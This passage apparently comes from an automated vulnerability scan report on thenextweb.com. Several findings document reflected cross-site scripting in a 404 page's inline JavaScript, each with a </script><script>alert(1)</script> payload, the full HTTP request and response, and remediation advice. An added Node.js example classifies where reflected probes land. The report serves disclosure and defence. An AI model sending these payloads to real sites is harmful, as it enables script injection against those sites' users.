Date: Wed, 05 Oct 2011 20:56:16 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...

    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/images/spreadus_button.png21bcc</script><script>alert(1)</script>54d465d8e71?version=1'
    };
</script>
...[SNIP]...

3.77. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a656</script><script>alert(1)</script>934b12ee9b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content2a656</script><script>alert(1)</script>934b12ee9b9/themes/tnw_6/static/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:02 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=p4vqoer71tp2c071c24dm9p845; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:32 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content2a656</script><script>alert(1)</script>934b12ee9b9/themes/tnw_6/static/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.78. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfc65</script><script>alert(1)</script>4f0124b7488 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themesdfc65</script><script>alert(1)</script>4f0124b7488/tnw_6/static/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:11 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=v6t7k8dsv36u68gvf7pqb33s33; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:41 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themesdfc65</script><script>alert(1)</script>4f0124b7488/tnw_6/static/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.79. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9164</script><script>alert(1)</script>1115affc524 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6f9164</script><script>alert(1)</script>1115affc524/static/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:20 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=knn7v5902md8fq4urb2p03d505; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:49 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
avascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6f9164</script><script>alert(1)</script>1115affc524/static/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.80. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca7f8</script><script>alert(1)</script>fda5be8e479 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6/staticca7f8</script><script>alert(1)</script>fda5be8e479/images/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:27 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=sa0c0ap13fp0fi05eneq6su1m6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:55:56 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
pt">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/staticca7f8</script><script>alert(1)</script>fda5be8e479/images/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.81. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6556</script><script>alert(1)</script>666a0cab711 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6/static/imagesc6556</script><script>alert(1)</script>666a0cab711/sprite.png?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:34 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=thnu87hc23vjhaaj3aqlnb9ko7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26112
Date: Wed, 05 Oct 2011 20:56:04 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/imagesc6556</script><script>alert(1)</script>666a0cab711/sprite.png?version=5'
    };
</script>
...[SNIP]...

3.82. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/images/sprite.png

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a456</script><script>alert(1)</script>c82b48ce1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themes/tnw_6/static/images/sprite.png1a456</script><script>alert(1)</script>c82b48ce1?version=5 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 127.0.0.1
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:56:19 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=e3qmo3o5f4tvedvgs2s7a7loe3; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:56:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26110
Date: Wed, 05 Oct 2011 20:56:20 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
NFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content/themes/tnw_6/static/images/sprite.png1a456</script><script>alert(1)</script>c82b48ce1?version=5'
    };
</script>
...[SNIP]...
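Added example, not the report's own tooling: the triage logic behind the wording "copied into a JavaScript string which is encapsulated in single quotation marks" and "echoed unmodified", written in Node.js. A scanner wraps its probe in random prefix and suffix tokens (here the 2a656 and 934b12ee9b9 of finding 3.77), looks for the prefix in the response, and then works out the context around the hit. The response text is a constructed excerpt modelled on the sprite.png 404 responses above; classifyReflections, jsStateAt and verdict are names chosen for this example. It also runs the counter-case, the same payload echoed with < and > escaped, which the classifier no longer reports as a break-out.

```javascript
// Added example: scanner-style triage of a reflected payload. Not the report's
// tooling; the response below is a constructed excerpt modelled on finding 3.77.

const PREFIX = '2a656';
const SUFFIX = '934b12ee9b9';
const PAYLOAD = PREFIX + '</script><script>alert(1)</script>' + SUFFIX;

// Constructed response body: the relevant part of the theme's 404 page with the
// request path reflected into $_CONFIG.current_url, as in the report.
const RESPONSE = [
  '<!DOCTYPE html>',
  '<html dir="ltr" lang="en-US">',
  '<head>',
  '<meta charset="UTF-8" />',
  '<title>Not Found</title>',
  '<script type="text/javascript">',
  '    var $_CONFIG = {',
  "    'site_url': 'http://thenextweb.com',",
  "    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',",
  "    'current_url': '/wp-content" + PAYLOAD + "/themes/tnw_6/static/images/sprite.png?version=5'",
  '    };',
  '</script>',
  '</head>',
  '<body><h1>Not Found</h1></body>',
  '</html>',
].join('\n');

// The same page after the fix in the remediation detail: < and > in the
// reflected value are emitted as JavaScript unicode escapes.
const RESPONSE_FIXED = RESPONSE.replace(
  PAYLOAD,
  PAYLOAD.replace(/</g, '\\u003c').replace(/>/g, '\\u003e')
);

// Walk JavaScript source and report the lexical state at its end: 'code',
// 'line' or 'block' comment, or the quote character of an open string literal.
// Deliberately small: enough for triage, not a full ECMAScript lexer.
function jsStateAt(src) {
  let state = 'code';
  for (let i = 0; i < src.length; i++) {
    const c = src[i];
    const n = src[i + 1];
    if (state === 'code') {
      if (c === "'" || c === '"' || c === '`') state = c;
      else if (c === '/' && n === '/') { state = 'line'; i++; }
      else if (c === '/' && n === '*') { state = 'block'; i++; }
    } else if (state === 'line') {
      if (c === '\n') state = 'code';
    } else if (state === 'block') {
      if (c === '*' && n === '/') { state = 'code'; i++; }
    } else if (c === '\\') {
      i++;                      // skip the escaped character inside a string
    } else if (c === state) {
      state = 'code';           // matching quote closes the literal
    }
  }
  return state;
}

// Find each reflection of the prefix token and describe where it landed: inside
// a <script> element or not, the JS lexical state at that point, and whether the
// whole payload survived byte-for-byte ("echoed unmodified").
function classifyReflections(html, prefix, payload) {
  const lower = html.toLowerCase();
  const hits = [];
  for (let at = html.indexOf(prefix); at !== -1; at = html.indexOf(prefix, at + prefix.length)) {
    const open = lower.lastIndexOf('<script', at);
    const close = lower.lastIndexOf('</script', at);
    const inScript = open !== -1 && open > close;
    let jsState = null;
    if (inScript) {
      const bodyStart = html.indexOf('>', open) + 1;
      jsState = jsStateAt(html.slice(bodyStart, at));
    }
    hits.push({ at, inScript, jsState, unmodified: html.startsWith(payload, at) });
  }
  return hits;
}

// Collapse the hits into the verdict a tester cares about.
function verdict(html, prefix, payload) {
  const hits = classifyReflections(html, prefix, payload);
  if (hits.length === 0) return 'not-reflected';
  const h = hits[0];
  if (!h.inScript) return 'html-context';
  if (h.unmodified && /<\/script/i.test(payload)) return 'script-breakout';
  if (h.jsState === "'" || h.jsState === '"' || h.jsState === '`') return 'script-string-encoded';
  return 'script-other';
}

console.log('as reported:', verdict(RESPONSE, PREFIX, PAYLOAD));
console.log('after fix:  ', verdict(RESPONSE_FIXED, PREFIX, PAYLOAD));
```

The 'script-breakout' verdict is what the report calls High / Certain: the hit sits inside a script element, the lexer is in a single-quoted string when it reaches the prefix, and the payload, </script> included, is present character for character. The 'script-string-encoded' result on the fixed page shows why "still reflected" is not the same as "still exploitable": the value is there, but the tokens that would end the script element are not.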

3.83. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78e52</script><script>alert(1)</script>67217806899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content78e52</script><script>alert(1)</script>67217806899/themes/tnw_6/style.css?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:07 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=73sbm98jtb4s0vgblhqo1679n6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:55:33 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content78e52</script><script>alert(1)</script>67217806899/themes/tnw_6/style.css?ver=8.21'
    };
</script>
...[SNIP]...

3.84. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76aa</script><script>alert(1)</script>8a6504a518d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response: the 404 page's inline $_CONFIG object assigns the raw request path to 'current_url'.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the payload contains a literal </script>, the HTML parser closes the script element at that point and opens a new one, so the injected script executes regardless of the surrounding single-quoted string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, encode it for the JavaScript string context and also escape <, > and & as \u003c, \u003e and \u0026, so that a reflected </script> cannot terminate the element; escaping only the quote character does not stop this attack. In PHP, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP) produces a literal that is safe in this position.

Request

GET /wp-content/themese76aa</script><script>alert(1)</script>8a6504a518d/tnw_6/style.css?ver=8.21 HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.2.227
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:25 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=io46pi954pgkbqkan90hu8q3a5; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26096
Date: Wed, 05 Oct 2011 20:55:54 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
